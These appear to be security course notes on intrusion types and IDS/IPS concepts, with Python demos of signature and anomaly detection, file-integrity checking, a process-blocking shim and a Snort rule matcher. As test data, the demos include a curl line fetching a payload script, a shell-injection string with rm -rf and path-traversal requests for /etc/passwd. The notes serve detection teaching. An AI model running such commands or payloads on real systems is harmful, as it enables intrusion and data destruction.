1.2 Intrusion Detection and Prevention Systems
Week 1 Day 2 - Intrusions & IDPS
Last Update Unknown
Intrusions
Definition:
A deliberate unauthorised attempt to: access information, manipulate information, or render a system unreliable or unusable
Intrusions can be divided into 6 main types:
- Attempted break-ins, which are detected by atypical behaviour profiles or violations of security constraints.
- Masquerade attacks, which are detected by atypical behaviour profiles or violations of security constraints.
- Penetration of the security control system, which is detected by monitoring for specific patterns of activity.
- Leakage, which is detected by atypical use of system resources.
- Denial of service, which is detected by atypical use of system resources.
- Malicious use, which is detected by atypical behaviour profiles, violations of security constraints, or use of special privileges.
IDPS Fundamentals
An Intrusion Detection System (IDS) is a lot like a Burglar Alarm. It reports an intrusion within the building, but can't stop the intruder making off with the loot.
IDS raises alarm to an administrator when it detects intrusions.
An Intrusion Prevention System (IPS) is more like a Guard Dog.
An IPS sensor typically raises an alarm too, but can also provide an Active Response to an intrusion (for example dropping the offending packets, resetting the connection or blocking the source address).
IDPS Alerts
Positive Alert
- Alert raised because an activity was identified as a possible intrusion
- Sometimes called an Event Of Interest (EOI)
Negative Alert
- No alert raised because the activity was identified as not an intrusion
- Activity deemed not an EOI
The IDS does not always get this right, so each decision is also classified as TRUE or FALSE:
- TRUE - Correct classification
- FALSE - Incorrect classification
This gives four outcomes: True Positive (real intrusion, alert raised), False Positive (benign activity, alert raised), True Negative (benign activity, no alert) and False Negative (real intrusion, no alert).
Therefore, an IDPS has to be tuned to maximise the number of True Positives whilst minimising the number of False Positives (which waste analyst time and erode trust in the alerts) and False Negatives (missed intrusions, which are silent and so the more dangerous of the two).
Intrusion Detection Methods
Signature / Misuse-based Intrusion Detection
- Signatures in simplest form are patterns which can be matched against activities being monitored
- String literal / regex pattern / Hex pattern
- Network IDS - Packet contents compared against signature database in an IDS Sensor
- Signature matches - raise alert
- Signatures could also be based on:
- Protocol, IP Addresses, Ports, Payload contents, State of connection
- Good for detecting known attacks
- Signature database must be kept up to date
- Typically low rates of false positives
- Poor detection of unknown attacks
Anomaly-based Intrusion Detection
- Abnormal activity (a deviation from normal conditions) is identified as suspicious
- Normal activity is captured in a Baseline profile built by monitoring the system over a training period
- Good for detecting unknown attacks
- Typically High rates of False Positives
- Difficult to create/keep up to date Baseline behaviour profiles
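The two detection methods above, and the True/False Positive/Negative classification from the IDPS Alerts section, can be shown side by side on one small data set. The example below is added here and is not code from the original notes: it runs a signature detector (a string pattern and a hex pattern) and an anomaly detector (a per-host connection-count baseline with a mean + 3 standard deviation threshold) over a constructed flow log containing one known attack, one unknown attack (a port sweep) and one benign burst from a backup host, then scores each detector against the ground-truth labels. The flows, signatures and baseline counts are all constructed for the demonstration.

```python
"""Signature vs anomaly detection on a constructed flow log, scored as TP/FP/TN/FN."""
import re
import statistics
from collections import Counter

# Constructed connection log (not captured traffic). Each record is
# (src_ip, dst_port, payload, ground_truth); ground_truth is "benign" or
# "attack" and is used only for scoring, never by the detectors.
FLOWS = (
    [("10.0.0.5", 80, b"GET /index.html HTTP/1.1", "benign")] * 3
    + [("10.0.0.6", 443, b"\x16\x03\x01 ClientHello", "benign")]
    # Known attack: directory traversal, for which a signature exists.
    + [("198.51.100.7", 80, b"GET /../../etc/passwd HTTP/1.1", "attack")]
    # Unknown attack: a port sweep with empty payloads; nothing to signature-match.
    + [("198.51.100.9", port, b"", "attack") for port in range(20, 30)]
    # Benign but unusual: a backup host opening many connections at once.
    + [("10.0.0.20", 445, b"SMB2 WRITE", "benign")] * 9
)

# Signature database: name -> compiled byte regex. The second entry is a hex
# pattern, the way a NIDS expresses a binary signature.
SIGNATURES = {
    "dir-traversal": re.compile(rb"\.\./\.\./etc/passwd"),
    "binary-probe": re.compile(rb"\x00\x02\x00"),
}


def signature_detect(flows):
    """One decision per flow: True when any signature matches the payload."""
    return [any(sig.search(payload) for sig in SIGNATURES.values())
            for _, _, payload, _ in flows]


# Baseline profile: connections per host observed during a training window
# known to contain only normal activity (constructed numbers).
BASELINE_CONNECTIONS_PER_HOST = [4, 5, 3, 4, 6]


def anomaly_threshold(baseline, k=3.0):
    """Hosts above mean + k * standard deviation of the baseline are anomalous."""
    return statistics.mean(baseline) + k * statistics.stdev(baseline)


def anomaly_detect(flows, threshold):
    """One decision per flow: True for every flow from a host whose connection
    count in this window exceeds the baseline threshold."""
    counts = Counter(src for src, _, _, _ in flows)
    return [counts[src] > threshold for src, _, _, _ in flows]


def score(decisions, flows):
    """Confusion matrix: compare each alert decision with the ground truth."""
    result = {"TP": 0, "FP": 0, "TN": 0, "FN": 0}
    for alerted, (_, _, _, truth) in zip(decisions, flows):
        is_attack = truth == "attack"
        if alerted:
            result["TP" if is_attack else "FP"] += 1
        else:
            result["FN" if is_attack else "TN"] += 1
    return result


if __name__ == "__main__":
    threshold = anomaly_threshold(BASELINE_CONNECTIONS_PER_HOST)
    print("signature:", score(signature_detect(FLOWS), FLOWS))
    print("anomaly:  ", score(anomaly_detect(FLOWS, threshold), FLOWS))
```

The result matches the bullet points: the signature detector catches the known traversal with no false positives but misses all ten sweep packets (false negatives), while the anomaly detector catches the sweep it has never seen a signature for, misses the single traversal request (one connection is not anomalous) and raises nine false positives on the backup host, because its burst was not in the baseline. Tuning means moving k, or adding the backup host's normal burst to the baseline, and re-scoring.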
Network IDS (NIDS)
NIDS collect packets from the network passively (they receive a copy of the traffic, typically from a switch SPAN/mirror port or a network TAP).
They are deployed at aggregation points (issues: the traffic volume can overwhelm the sensor, and mirroring can reduce the performance of the switch).
The sensor's Network Interface Card (NIC) runs in Promiscuous mode (it listens to all traffic, whether addressed to the sensor or not).
Deployment is typically as an Out-of-line Sensor: it sees a copy of the traffic and therefore cannot block anything.
Network IPS (NIPS)
NIPS are typically deployed at network perimeters, between two networks.
Placing the sensor just inside the firewall is typical: it then sees traffic after NAT has been applied and VPN tunnels terminated, which helps with inspecting VPN traffic and tracing an intrusion back to the real internal address.
Deployment is typically as an In-line Sensor at an aggregation point.
The sensor needs multiple Network Interface Cards (NICs): traffic flows through the sensor from one network to the other, which is what lets it drop packets, but it also makes the sensor a single point of failure and a source of latency.
Host-based IDS (HIDS)
Host-only Network Traffic Monitoring
- HIDS monitor the host's own network traffic, with the NICs in non-promiscuous mode, on all of the host's interfaces.
System Integrity Verifiers (SIV)
- They can also monitor a list of critical business/system files for changes, checked periodically.
- The HIDS agent generates a hash of each file as a baseline, then periodically re-hashes the file and compares the result to check its integrity.
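A minimal System Integrity Verifier, added here as an illustration rather than code from any HIDS product: it records a SHA-256 digest, size and permission bits for each monitored file, then re-checks and reports every deviation. The "critical files" are constructed in a temporary directory so the demonstration runs offline; the three tampering cases (a same-length content edit, a deleted file and a permission change with the content untouched) are chosen because each one is invisible to at least one of the other checks.

```python
"""System Integrity Verifier: baseline file hashes, then re-check for changes.
Added example, not code from any HIDS product."""
import hashlib
import os
import tempfile
from pathlib import Path

CHUNK = 64 * 1024


def file_digest(path):
    """SHA-256 of a file, read in chunks so large files need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(path):
    """Everything we compare: content hash plus size and permission bits.
    mtime is deliberately not used; an attacker can reset it with touch."""
    st = os.stat(path)
    return {"sha256": file_digest(path), "size": st.st_size, "mode": st.st_mode & 0o7777}


def build_baseline(paths):
    """Record a snapshot of every monitored file (run once on a known-good host)."""
    return {str(p): snapshot(p) for p in paths}


def verify(baseline):
    """Re-snapshot each file and report (path, finding) for every deviation."""
    findings = []
    for path, expected in baseline.items():
        if not os.path.exists(path):
            findings.append((path, "missing"))
            continue
        current = snapshot(path)
        for key in ("sha256", "size", "mode"):
            if current[key] != expected[key]:
                findings.append((path, f"{key} changed"))
    return findings


def demo():
    """Constructed critical files in a temp dir: baseline, tamper three ways, verify."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        files = {
            "passwd": b"root:x:0:0:root:/root:/bin/bash\n",
            "sshd_config": b"PermitRootLogin no\n",
            "hosts": b"127.0.0.1 localhost\n",
        }
        for name, data in files.items():
            (root / name).write_bytes(data)
            (root / name).chmod(0o644)   # pin the mode so the demo is umask-independent
        baseline = build_baseline(root / name for name in files)

        (root / "sshd_config").write_bytes(b"PermitRootLogin ye\n")  # same size, new content
        (root / "hosts").unlink()                                    # file removed
        (root / "passwd").chmod(0o666)                               # content intact, now world-writable
        return sorted((Path(p).name, finding) for p, finding in verify(baseline))


if __name__ == "__main__":
    for name, finding in demo():
        print(f"{name}: {finding}")
```

Two practical points the code does not show: the baseline must be kept somewhere the host cannot rewrite it (off-host, or signed), since an attacker with root on the box can otherwise re-baseline after tampering; and the check interval is a detection gap, because a file modified and restored between two runs is never seen.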
Log File Monitors (LFM)
- Analysing log/audit files from OS/Applications/Devices by seeing if they match patterns or signatures
Host-based IPS (HIPS)
HIPS monitor host activities as they happen.
They use a Shim, a layer of code installed between two other layers of code (for example between an application and the operating system's system-call interface), to inspect the data passed between those layers and block a call that violates policy before it completes. An example of this would be Cisco CSA (Cisco Security Agent).
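The shim idea in the smallest working form, added here as an illustration and not taken from Cisco CSA or any other product: the wrapper below is installed in place of the process-creation call, consults a policy on every invocation, and either lets the call through or blocks it (the "detect" mode only logs, which is the HIDS behaviour). The allowlist and the three launch attempts are constructed for the demonstration.

```python
"""A host-based shim: intercept process creation, apply a policy, block or pass through.
Added example; not Cisco CSA or any product's code."""
import logging
import os
import subprocess
import sys

log = logging.getLogger("hips")

# Constructed allowlist: the executables this host is permitted to spawn.
ALLOWED_EXECUTABLES = {"ls", "cat", os.path.basename(sys.executable)}


class PolicyViolation(PermissionError):
    """Raised by the shim in block mode when a call breaks policy."""


def process_policy(args, kwargs):
    """Policy for process creation: return None to allow, or a reason to block."""
    if kwargs.get("shell"):
        return "shell=True re-parses the command string through /bin/sh; blocked"
    argv = args[0] if args else kwargs.get("args")
    if isinstance(argv, (str, bytes, os.PathLike)):
        argv = [argv]
    exe = os.path.basename(os.fsdecode(argv[0]))
    if exe not in ALLOWED_EXECUTABLES:
        return f"executable {exe!r} is not in the allowlist"
    return None


def install_shim(module, attr, policy, mode="block"):
    """Replace module.attr with a wrapper that consults `policy` before every call.
    mode="block" raises on violation (IPS); mode="detect" only logs it (IDS)."""
    original = getattr(module, attr)

    def shim(*args, **kwargs):
        reason = policy(args, kwargs)
        if reason is not None:
            log.warning("%s.%s: %s; args=%r", module.__name__, attr, reason, args)
            if mode == "block":
                raise PolicyViolation(reason)
        return original(*args, **kwargs)

    shim.__name__ = attr
    shim.__wrapped_original__ = original   # kept so the shim can be removed cleanly
    setattr(module, attr, shim)


def remove_shim(module, attr):
    """Restore the original callable saved by install_shim."""
    setattr(module, attr, getattr(module, attr).__wrapped_original__)


def demo():
    """Shim subprocess.Popen (subprocess.run goes through it), try three launches,
    then restore. Returns the outcome of each launch and whether the shim came off."""
    install_shim(subprocess, "Popen", process_policy)
    outcomes = []
    try:
        attempts = [
            ([sys.executable, "-c", "print('ok')"], {}),        # allowlisted interpreter
            ("ls -la; rm -rf /tmp/scratch", {"shell": True}),   # shell metacharacters
            (["curl", "http://203.0.113.5/payload.sh"], {}),    # not allowlisted
        ]
        for argv, extra in attempts:
            try:
                done = subprocess.run(argv, capture_output=True, text=True, **extra)
                outcomes.append(("allowed", done.stdout.strip()))
            except PolicyViolation as exc:
                outcomes.append(("blocked", str(exc)))
    finally:
        remove_shim(subprocess, "Popen")
    return {"outcomes": outcomes,
            "shim_removed": not hasattr(subprocess.Popen, "__wrapped_original__")}


if __name__ == "__main__":
    for status, detail in demo()["outcomes"]:
        print(f"{status:8} {detail}")
```

A wrapper at this level only protects code that goes through the wrapped call; a process can import another path around it. A real HIPS therefore places the shim below the application, in a kernel driver or system-call filter, so that the code being protected cannot choose to bypass it, which is exactly why the sensor has to be installed on every host it is meant to protect.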
Honeypots
A honeypot is a security tool that helps defend computer systems in a way the other sensors cannot: it is a network-attached system with no production purpose, used as a decoy to distract cyber attackers from their real targets. Because no legitimate user has a reason to touch it, any interaction with it is suspicious, so it produces very few false positives, and security analysts can gather information from the attacks it attracts to improve security policies and protect the real network.
Snort IDS
Snort is an Open Source Intrusion Detection/Prevention System which uses a series of rules that define malicious network activity; it inspects packets against those rules and generates alerts for users when a packet matches.
Snort rules have 2 parts, the header and the options.
The rule header consists of an action (e.g. log, alert, drop), a protocol to match (ip, tcp, udp, icmp), source and destination IP addresses or ranges, ports, and the direction of the packets (-> for one direction, <> for either).
The rule options, enclosed in parentheses and separated by semicolons, are keywords describing what to match in the payload (e.g. content, pcre), how and where to match it (e.g. nocase, offset, depth) and what to output when the rule matches a packet (e.g. msg, sid).
The format of Snort detection rules is as follows:
action protocol src-ip src-port -> dest-ip dest-port (packet-payload-params; output-msg;)
Example Question:
Regarding the below Snort detection rule, detail the layer 4 information which will be matched against network packets, and the payload signature being searched for.
Answer: the layer 4 protocol TCP and the server (destination) port number 8888 are matched, and the hex signature |00 02 00| will be searched for in the packet payload.
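The rule the question refers to is not reproduced on this page, so the example below, added here and not part of the original notes or of Snort itself, parses and applies two constructed rules of the same shape: one matching TCP traffic to port 8888 carrying the hex bytes |00 02 00|, the other a nocase text signature on port 80. It implements the header fields from the format above and the msg, content (text and |hex| runs), nocase and sid options; it assumes no $VARIABLES, no escaped quotes inside option values and no pcre/flow options, and the packets are constructed records rather than captured traffic.

```python
"""Minimal Snort rule parser and matcher. Added example, not Snort's own code.
Supports: header fields, msg, content (text and |hex| runs), nocase, sid.
Assumed simplifications: no $VARIABLES, no escaped quotes, no pcre/flow options."""
import ipaddress
import re
from dataclasses import dataclass, field

HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$", re.S)
OPTION_RE = re.compile(r'\s*(\w+)\s*(?::\s*("[^"]*"|[^;]*))?;')


def decode_content(text):
    """Snort content strings mix literal text with |hh hh| hex runs."""
    parts = text.split("|")
    if len(parts) % 2 == 0:
        raise ValueError(f"unbalanced '|' in content {text!r}")
    out = bytearray()
    for i, part in enumerate(parts):
        out += bytes.fromhex(part) if i % 2 else part.encode("latin-1")
    return bytes(out)


def _port_ok(spec, port):
    if spec == "any":
        return True
    if ":" in spec:  # Snort range syntax: 1024:, :1023, 8000:8999
        lo, hi = spec.split(":", 1)
        return (not lo or int(lo) <= port) and (not hi or port <= int(hi))
    return int(spec) == port


def _addr_ok(spec, addr):
    if spec == "any":
        return True
    negate = spec.startswith("!")
    nets = spec.lstrip("!").strip("[]").split(",")
    hit = any(ipaddress.ip_address(addr) in ipaddress.ip_network(n, strict=False) for n in nets)
    return hit != negate


@dataclass
class Rule:
    action: str
    proto: str
    src: str
    sport: str
    direction: str
    dst: str
    dport: str
    msg: str = ""
    sid: int = 0
    contents: list = field(default_factory=list)  # [[bytes, nocase], ...]

    @classmethod
    def parse(cls, text):
        m = HEADER_RE.match(text.strip())
        if not m:
            raise ValueError(f"bad rule header: {text!r}")
        rule = cls(m["action"], m["proto"].lower(), m["src"], m["sport"],
                   m["dir"], m["dst"], m["dport"])
        for key, value in OPTION_RE.findall(m["opts"]):
            value = value.strip().strip('"')
            if key == "msg":
                rule.msg = value
            elif key == "sid":
                rule.sid = int(value)
            elif key == "content":
                rule.contents.append([decode_content(value), False])
            elif key == "nocase" and rule.contents:
                rule.contents[-1][1] = True  # modifier applies to the preceding content
        return rule

    def layer4(self):
        """The transport-layer selectors checked before any payload inspection."""
        return self.proto, self.sport, self.dport

    def _endpoints_ok(self, pkt):
        fwd = (_addr_ok(self.src, pkt["src"]) and _port_ok(self.sport, pkt["sport"])
               and _addr_ok(self.dst, pkt["dst"]) and _port_ok(self.dport, pkt["dport"]))
        if self.direction == "->":
            return fwd
        rev = (_addr_ok(self.src, pkt["dst"]) and _port_ok(self.sport, pkt["dport"])
               and _addr_ok(self.dst, pkt["src"]) and _port_ok(self.dport, pkt["sport"]))
        return fwd or rev

    def matches(self, pkt):
        if self.proto != "ip" and self.proto != pkt["proto"]:
            return False
        if not self._endpoints_ok(pkt):
            return False
        for pattern, nocase in self.contents:  # every content must be present
            hay, needle = (pkt["payload"].lower(), pattern.lower()) if nocase else (pkt["payload"], pattern)
            if needle not in hay:
                return False
        return True


def evaluate(rules, packets):
    """Run every rule over every packet; return the (sid, msg) alerts raised."""
    return [(r.sid, r.msg) for pkt in packets for r in rules if r.matches(pkt)]


# Constructed rules and packets for the demonstration.
RULES = [Rule.parse(r) for r in (
    'alert tcp any any -> 192.0.2.0/24 8888 (msg:"Binary probe to 8888"; content:"|00 02 00|"; sid:1000001; rev:1;)',
    'alert tcp any any -> any 80 (msg:"Path traversal"; content:"../../etc/passwd"; nocase; sid:1000002;)',
)]
PACKETS = [
    dict(proto="tcp", src="203.0.113.9", sport=40001, dst="192.0.2.10", dport=8888, payload=b"\x00\x02\x00\x01hello"),
    dict(proto="tcp", src="203.0.113.9", sport=40002, dst="192.0.2.10", dport=8889, payload=b"\x00\x02\x00\x01hello"),
    dict(proto="udp", src="203.0.113.9", sport=40003, dst="192.0.2.10", dport=8888, payload=b"\x00\x02\x00"),
    dict(proto="tcp", src="198.51.100.4", sport=51000, dst="192.0.2.20", dport=80, payload=b"GET /../../ETC/PASSWD HTTP/1.0"),
]

if __name__ == "__main__":
    for sid, msg in evaluate(RULES, PACKETS):
        print(f"[{sid}] {msg}")
```

The order of checks mirrors how a sensor is tuned for throughput: protocol, addresses and ports are cheap integer comparisons and discard most packets (the second and third packets never reach payload inspection), so the byte search for |00 02 00| only runs on traffic that already matches the layer 3/4 header.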